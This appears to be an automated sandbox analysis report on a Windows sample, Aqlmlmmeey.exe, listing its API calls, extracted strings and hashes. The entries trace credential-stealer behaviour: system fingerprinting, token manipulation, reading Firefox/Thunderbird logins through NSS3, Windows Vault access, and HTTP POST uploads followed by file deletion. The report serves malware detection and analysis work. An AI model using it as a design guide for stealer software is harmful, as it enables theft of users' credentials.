Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 3528 Parent PID: 1700

General

Start time:	07:38:39
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /T 10 /NOBREAK
Imagebase:	0x7ff797770000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Aqlmlmmeey.exe PID: 5164 Parent PID: 5248 Aqlmlmmeey.exeCOMMON

Executed Functions

Function 0042C383, Relevance: 144.8, APIs: 34, Strings: 45, Instructions: 6501threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042C388
CoInitialize.OLE32(00000000), ref: 0042C3A4

Part of subcall function 004360E7: OpenMutexA.KERNEL32 ref: 00436130
Part of subcall function 004360E7: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0043613D

CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00432A17

Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92

GetUserDefaultLCID.KERNEL32(00001001,?,000000FF), ref: 0042C3E8
GetLocaleInfoA.KERNEL32(00000000), ref: 0042C3EF

Part of subcall function 00438EA2: __EH_prolog.LIBCMT ref: 00438EA7
Part of subcall function 00438EA2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00438F09
Part of subcall function 00438EA2: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00438F23
Part of subcall function 00438EA2: OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,00000000), ref: 00438F97
Part of subcall function 00438EA2: OpenProcessToken.ADVAPI32(00000000,000F01FF,?,?,?,00000000), ref: 00438FA9
Part of subcall function 00438EA2: DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,?,?,?,00000000), ref: 00438FC4
Part of subcall function 00438EA2: CloseHandle.KERNEL32(?,?,?,00000000), ref: 00438FD1
Part of subcall function 00438EA2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 00438FE4

Part of subcall function 00414F98: __EH_prolog.LIBCMT ref: 00414F9D

Sleep.KERNEL32(00001388,00489110,00000000,0047935B), ref: 0042C988

Part of subcall function 004358BF: __EH_prolog.LIBCMT ref: 004358C4

GetUserNameA.ADVAPI32(?,00000101), ref: 0042CB6C

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Sleep.KERNEL32(00007530), ref: 0042CD2A

Part of subcall function 00423759: __EH_prolog.LIBCMT ref: 0042375E

_strlen.LIBCMT ref: 0042CE4B
_strlen.LIBCMT ref: 0042CE65
CreateThread.KERNEL32 ref: 0042D0AF
CreateThread.KERNEL32 ref: 0042D0C1
StrToIntA.SHLWAPI(00000000,00000000,00489798), ref: 0042D203

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004344AA: __EH_prolog.LIBCMT ref: 004344AF
Part of subcall function 004344AA: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
Part of subcall function 004344AA: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

CreateThread.KERNEL32 ref: 0042D524
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0042D52D
CreateThread.KERNEL32 ref: 0042D0D3

Part of subcall function 00432C77: __EH_prolog.LIBCMT ref: 00432C7C

Part of subcall function 004296D2: __EH_prolog.LIBCMT ref: 004296D7

Part of subcall function 00438CD8: __EH_prolog.LIBCMT ref: 00438CDD

Strings

/, xrefs: 0042FB5E
s, xrefs: 0042E432
[, xrefs: 0042D71E
Q, xrefs: 00430A01
0, xrefs: 0042DB43
G, xrefs: 00431A40
POST, xrefs: 0042CCCF
, xrefs: 00432336
f, xrefs: 0042F829
2, xrefs: 0042E71B
(, xrefs: 0042DA2D
\, xrefs: 0042E886
~, xrefs: 004323B2
4, xrefs: 0042DC7E
{, xrefs: 0042DF58
v, xrefs: 004304EB
7, xrefs: 0042F365
<, xrefs: 0042D902
Q, xrefs: 00432565
}, xrefs: 0042F1CF
5, xrefs: 00432073
r, xrefs: 00431B48
H, xrefs: 0042EEF7
&, xrefs: 0043267F
h, xrefs: 0042EB3F
,, xrefs: 0042ED26
qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O , xrefs: 0042C6B7
9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== , xrefs: 0042C6C7
_id, xrefs: 004319DB
<, xrefs: 00430ED7
GET, xrefs: 0042C910, 0042C9A5
O, xrefs: 0043283E
25ef3d2ceb7c85368a843a6d0ff8291d , xrefs: 0042C6DA
W, xrefs: 004321D2
C, xrefs: 00430075
s, xrefs: 0043245F
p, xrefs: 0042EC49
N, xrefs: 0042FCEE
=, xrefs: 0042E9ED
V, xrefs: 004301B5
_, xrefs: 004306E4
b, xrefs: 00432269
S, xrefs: 00431FEE
:, xrefs: 0042F9CD
C, xrefs: 0042D807

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Create$OpenToken$ProcessThread$DeallocateFileGlobalInformationMutexNameSleepUser_strlen$AllocCloseConvertCurrentDefaultDuplicateEnvironmentErrorFirstFreeHandleHttpInfoInitializeLastLocaleModuleObjectProcess32SingleSnapshotStringToolhelp32UninitializeVariableWait_strcat
String ID: $&$($,$/$0$2$25ef3d2ceb7c85368a843a6d0ff8291d $4$5$7$9DdPQajmZndZ4qCLnM5Gu8kEArObEJr9kpZfshjMFLdbDkIa0SdMPw== $:$<$<$=$C$C$G$GET$H$N$O$POST$Q$Q$S$V$W$[$\$_$_id$b$f$h$p$qSVdAbi/K2pPr/3e18wU+9RXCqXPWsSoxpYUtF+O $r$s$s$v${$}$~
API String ID: 376243089-3970548752
Opcode ID: 900c98827a97e0e98eec9b2867e15fbba5d65236d471b205d428b5e2c74c0819
Instruction ID: 4fe60910e1ec4b79d226cabb142ab88437985495ab14f2297e82cd6290d5d1cb
Opcode Fuzzy Hash: 900c98827a97e0e98eec9b2867e15fbba5d65236d471b205d428b5e2c74c0819
Instruction Fuzzy Hash: DED39F34D052A89ADF25E765DC51BEDBBB46F25308F0004DEA54973293DE782B88CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00437819, Relevance: 104.4, APIs: 13, Strings: 46, Instructions: 1169COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043781E

Part of subcall function 004373C6: __EH_prolog.LIBCMT ref: 004373CB
Part of subcall function 004373C6: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
Part of subcall function 004373C6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
Part of subcall function 004373C6: RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6

_strftime.LIBCMT ref: 0043794F
GetUserDefaultLCID.KERNEL32(00001001,?,00000100,?,?,?,?,?), ref: 00437978
GetLocaleInfoA.KERNEL32(00000000), ref: 0043797F
GetUserNameA.ADVAPI32(?,?), ref: 00437BD0
GetComputerNameA.KERNEL32(?,00000101), ref: 00438275
GetUserNameA.ADVAPI32(00000001,00000101), ref: 004382EF
GetSystemInfo.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,00000000,00000012,00000040,00000001), ref: 0043861D
GlobalMemoryStatusEx.KERNEL32(?,?,?,00000000,00000012,00000040,00000001), ref: 00438707
GetSystemMetrics.USER32 ref: 0043888C

Part of subcall function 00439503: __EH_prolog.LIBCMT ref: 00439508

Part of subcall function 00413B98: __EH_prolog.LIBCMT ref: 00413B9D

GetSystemMetrics.USER32 ref: 004388B4
EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00438950
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004389AC

Strings

/Ifc, xrefs: 00437E62
0000, xrefs: 00437D22
1+, xrefs: 00437DA8
F"#5-2)6, xrefs: 00437CE7
(EJ( , xrefs: 0043877A
v, xrefs: 00437B85
am, xrefs: 00438178
x, xrefs: 00437B42
Z, xrefs: 004388E8
!;, xrefs: 00438407
tcu/, xrefs: 00438678
+Hdd, xrefs: 00437D92
m{, xrefs: 00437B7F
:, xrefs: 00438330
9}<), xrefs: 00437AE5
FPFY, xrefs: 004379D9
2p]F, xrefs: 00437B76
qt, xrefs: 00437915
XLJH, xrefs: 00437F33
Wed Sep 8 00:01:38 2021, xrefs: 00437A2B
s, xrefs: 00437A5D
3>58, xrefs: 00437ADB
2'6i, xrefs: 00437A53
x, xrefs: 00437FA6
g}, xrefs: 00437AF1
4L, xrefs: 00438456
00, xrefs: 00437D38
aaaaaaaaaaaaa, xrefs: 004389F7
/L_Z, xrefs: 004384B7
JSRO, xrefs: 0043883F
:TN, xrefs: 00438326
USED, xrefs: 004387C8
., xrefs: 004381ED
)vl, xrefs: 00438220
isut, xrefs: 0043831C
)!, xrefs: 00438653
Qt, xrefs: 004378EE
V\, xrefs: 004388DF
`bnx, xrefs: 00437D9E
5/, xrefs: 004384C0
j|5/, xrefs: 00437E6E
0000, xrefs: 00437D2C
t5q|, xrefs: 0043790B
rRR_R 3?HR, xrefs: 004386DA
@, xrefs: 004386FC
KKFK";QK, xrefs: 00438050

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$NameSystemUser$DevicesDisplayEnumInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
String ID: )!$ :TN$!;$(EJ( $)vl$+Hdd$.$/Ifc$/L_Z$00$0000$0000$1+$2'6i$2p]F$3>58$4L$5/$9}<)$:$@$F"#5-2)6$FPFY$JSRO$KKFK";QK$Qt$USED$V\$Wed Sep 8 00:01:38 2021$XLJH$Z$`bnx$aaaaaaaaaaaaa$am$g}$isut$j|5/$m{$qt$rRR_R 3?HR$s$t5q|$tcu/$v$x$x
API String ID: 3358139242-950190238
Opcode ID: cae43481c554aff4eea723a65c3d720e31b0f005f30009302f2c1ec32c59cfa0
Instruction ID: dd1f520b829340a486540dcb48aec28350ce5d403088cebc98d7579fb37bcb2b
Opcode Fuzzy Hash: cae43481c554aff4eea723a65c3d720e31b0f005f30009302f2c1ec32c59cfa0
Instruction Fuzzy Hash: A3B2D0309083988ACF25DB7588957EDBB71AF1A304F0045EED4897B242EB781F89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043628C, Relevance: 90.3, APIs: 37, Strings: 14, Instructions: 1081registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436291

Part of subcall function 0043922A: __EH_prolog.LIBCMT ref: 0043922F

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040), ref: 0043638B
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436398
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 004363D1
wsprintfW.USER32 ref: 004363F9
RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436418
RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436494
RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,00000001,?,?,?,?,?,0048A6F8), ref: 00436639
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043671A
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436739
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043673E
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436743
RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043675A
RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436788
wsprintfW.USER32 ref: 004367B0
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 004367CF
RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043684B
RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,00000001,?,00000001,?,?,?,?,?,0048A6F8), ref: 004369DF
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AC0
RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436ADF
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE4
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE9
RegOpenKeyExW.KERNEL32(80000003,0047D410,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B03
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B13
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00436B3D
RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436B85
wsprintfW.USER32 ref: 00436BB0
RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436BCF
RegEnumKeyExW.KERNEL32(?,00000000,?,283C115D,00000000,00000000,00000000,00000000,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040), ref: 00436C0B
wsprintfW.USER32 ref: 00436C3B
RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012), ref: 00436C5A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012,00000040,00000001), ref: 00436C67
RegQueryValueExA.ADVAPI32(?,tcu/,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,00438A36,00000000), ref: 00436CE4
RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436F90
RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043716C

Strings

8, xrefs: 00436309
6`_ECWZ, xrefs: 00436552
k, xrefs: 004370BD
3>589}<)g}, xrefs: 00436A15, 00436A49, 00436A9F, 0043666F, 004366A3, 004366F9, 004366AD, 00436A53
k`x|, xrefs: 00436930
/$<8, xrefs: 00436DC5
|9, xrefs: 004365B7
3, xrefs: 0043696E
!eHRQM@Xo@LD, xrefs: 0043682A
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0043635C, 004363E8, 00436750, 0043679F, 00436B98
kKC, xrefs: 0043669E
?, xrefs: 0043637B
, xrefs: 0043713B
%s\%s, xrefs: 004363F3, 004367AA, 00436BAA, 00436C35

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
String ID: $!eHRQM@Xo@LD$%s\%s$/$<8$3$3>589}<)g}$6`_ECWZ$8$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$k$kKC$k`x|$|9
API String ID: 2335028583-1150690332
Opcode ID: 1e608862c6658f8e3a5320ce71d03f2eac0cd1a06fefe2dffcec57dfab21e561
Instruction ID: 91b8013d12c5bab7949268fbb79717665483f54acc398f6523401afbc0a33be3
Opcode Fuzzy Hash: 1e608862c6658f8e3a5320ce71d03f2eac0cd1a06fefe2dffcec57dfab21e561
Instruction Fuzzy Hash: 56A2D170D0425D9EDF25CFA4CC81BEEBBB4AF19304F1081AEE449B7242DB744A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433882, Relevance: 65.3, APIs: 34, Strings: 3, Instructions: 569filestringmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00433887
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00433B2C
CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00433BAB
WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 00433BBE
CloseHandle.KERNEL32(00000000), ref: 00433BC5
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00433BD9
GetFileSize.KERNEL32(00000000,00000000), ref: 00433BE8
GetProcessHeap.KERNEL32(00000000,00000800), ref: 00433BF9
HeapAlloc.KERNEL32(00000000), ref: 00433C00
lstrlenA.KERNEL32 ref: 00433C17
lstrcpynA.KERNEL32(00000000,00000001), ref: 00433C2C
lstrlenA.KERNEL32(?), ref: 00433C39
lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C48
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00433C5F
lstrlenA.KERNEL32(?), ref: 00433C75
lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C88
WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00433C99
WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 00433CBA
WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 00433CC5
WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00433D58

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00433E48
WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 00433EB6
WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00433F26
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00433F4E
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00433F64
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00433F99

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpCloseHandle.WINHTTP(00000000), ref: 00434048
WinHttpCloseHandle.WINHTTP(00000000), ref: 00434052
CloseHandle.KERNEL32(?), ref: 0043405B
DeleteFileA.KERNEL32(?), ref: 00434064
WinHttpCloseHandle.WINHTTP(00000000), ref: 0043406B
GetProcessHeap.KERNEL32(00000000,00000010), ref: 00434075
HeapFree.KERNEL32(00000000), ref: 0043407C

Strings

POST, xrefs: 00433E42, 00433EB0
%[^:]://%[^/]%[^], xrefs: 00433CDC
https, xrefs: 00433CEF

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableConnectDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
String ID: %[^:]://%[^/]%[^]$POST$https
API String ID: 2264578430-666396942
Opcode ID: d92a94022604ccf061ac87f05ba5a5553ffc0024b394eee5029c5b2754cacab9
Instruction ID: 268c877f1b69af4e096e1ece1c9e45decc44a1bdff283dbd08e4261261832945
Opcode Fuzzy Hash: d92a94022604ccf061ac87f05ba5a5553ffc0024b394eee5029c5b2754cacab9
Instruction Fuzzy Hash: BD32BB70E002589FDB21DFA5CD85AEEBBB4BF09304F0041AEE449A7251EB745E85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2F9, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 0042A341
LoadLibraryA.KERNEL32(?), ref: 0042A395
GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
GetProcAddress.KERNEL32(00000000,?), ref: 0042A499
GetProcAddress.KERNEL32(00000000,?), ref: 0042A4D5
GetProcAddress.KERNEL32(00000000,?), ref: 0042A50E
lstrlenW.KERNEL32(?), ref: 0042A5D1
lstrcpyW.KERNEL32 ref: 0042A5EC
lstrlenW.KERNEL32(?), ref: 0042A5F9
lstrcpyW.KERNEL32 ref: 0042A618
lstrlenW.KERNEL32(?), ref: 0042A625
lstrcpyW.KERNEL32 ref: 0042A649
lstrlenW.KERNEL32(?), ref: 0042A67D
lstrcpyW.KERNEL32 ref: 0042A69E
StrStrIW.SHLWAPI(?,Internet Explorer), ref: 0042A7B5
lstrlenW.KERNEL32(00000000), ref: 0042A7C0
lstrlenW.KERNEL32(?), ref: 0042A7D0
FreeLibrary.KERNEL32(00000000), ref: 0042A85E

Strings

%, xrefs: 0042A47B
Internet Explorer, xrefs: 0042A7AF
vAULTgETiTEM, xrefs: 0042A4C7
^(?+2*=27p:22, xrefs: 0042A389
RCKU, xrefs: 0042A433

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
String ID: vAULTgETiTEM$%$Internet Explorer$RCKU$^(?+2*=27p:22
API String ID: 4222390991-95504026
Opcode ID: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
Instruction ID: ee027e3256dc64104db3165579ce757a5594af22ad4575cabb0489d1c635360c
Opcode Fuzzy Hash: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
Instruction Fuzzy Hash: EBF19E71E002689FDF14DFA8DC48BEEBBB8EF49304F10446AE805E7211D7789955CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004210B1, Relevance: 50.3, APIs: 7, Strings: 21, Instructions: 1335COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004210B6
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004210EB

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Init.NSS3(?,?,?,?,?,?), ref: 0042124D
NSS_Shutdown.NSS3(?,00000001,?,00000001,?,?,?), ref: 004225EB

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

sqlite3_finalize.NSS3(?), ref: 004218A4
sqlite3_close.NSS3(?), ref: 004218B1
__fread_nolock.LIBCMT ref: 00421AB2

Part of subcall function 00427160: __EH_prolog.LIBCMT ref: 00427165

Strings

>6, xrefs: 004221ED
W9#, xrefs: 00421809
%, xrefs: 00422564
<4, xrefs: 00421BF8
xf, xrefs: 00422094
Gy_H, xrefs: 0042207E
logins, xrefs: 00421B2C, 00421B45
&NIURHGKC, xrefs: 00421E26
1', xrefs: 00422279
v, xrefs: 004218FD
F )4, xrefs: 004222F9
*-0, xrefs: 00421648
nt{w, xrefs: 00421BAD
6rkw, xrefs: 004218F6
c.,9, xrefs: 00421618
:,, xrefs: 00422141
ThunderBird, xrefs: 00421B91
2:, xrefs: 004220EB
RD, xrefs: 00421D86
Profiles, xrefs: 004210FD
*LEX, xrefs: 00422074

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolock_strcatsqlite3_closesqlite3_finalize
String ID: %$&NIURHGKC$*-0$*LEX$1'$2:$6rkw$:,$<4$>6$F )4$Gy_H$Profiles$RD$ThunderBird$W9#$c.,9$logins$nt{w$v$xf
API String ID: 1928370683-529884781
Opcode ID: ed51806d025d7bc53d2f6651653f5bbe3bdb81b1ded3c2a676ed93e6e0ef2c20
Instruction ID: 7cf0c16e80d84c1340ed0f8113b1c6eecb7c157959f31b42812db283f23df99d
Opcode Fuzzy Hash: ed51806d025d7bc53d2f6651653f5bbe3bdb81b1ded3c2a676ed93e6e0ef2c20
Instruction Fuzzy Hash: E2D29A70E002A88BCB25DF69D990BEDBBB1AF19304F5041EED409A7252DB785F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004206DD, Relevance: 40.9, APIs: 15, Strings: 8, Instructions: 607libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004206E2

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 004208B8

Part of subcall function 00420568: __EH_prolog.LIBCMT ref: 0042056D

LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 00420BB1
GetProcAddress.KERNEL32(00000000,orr~hOHU), ref: 00420BFE
GetProcAddress.KERNEL32(00000000,575B5B46), ref: 00420C3E
GetProcAddress.KERNEL32(00000000,?), ref: 00420C7A
GetProcAddress.KERNEL32(00000000,QJ00F[[W), ref: 00420CBB
GetProcAddress.KERNEL32(00000000,?), ref: 00420CEF
GetProcAddress.KERNEL32(00000000,?), ref: 00420D1D
GetProcAddress.KERNEL32(00000000,F[[W[`}|1.;0), ref: 00420D5C
GetProcAddress.KERNEL32(00000000,?), ref: 00420D8C
GetProcAddress.KERNEL32(00000000,44415C5E), ref: 00420DCA
GetProcAddress.KERNEL32(00000000,?), ref: 00420E08
GetProcAddress.KERNEL32(00000000,?), ref: 00420E38
GetProcAddress.KERNEL32(00000000,2A2F3230), ref: 00420E77

Strings

orr~hOHU, xrefs: 00420BF5, 00420BF8
02/*, xrefs: 00420E44
/,0, xrefs: 00420E52
QJ00F[[W, xrefs: 00420CB2, 00420CB9
yFE^, xrefs: 00420C59
FaOS, xrefs: 00420C52
&, xrefs: 00420E59
4du`|, xrefs: 00420AE9

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
String ID: /,0$&$02/*$4du`|$FaOS$QJ00F[[W$orr~hOHU$yFE^
API String ID: 1501777685-1778109498
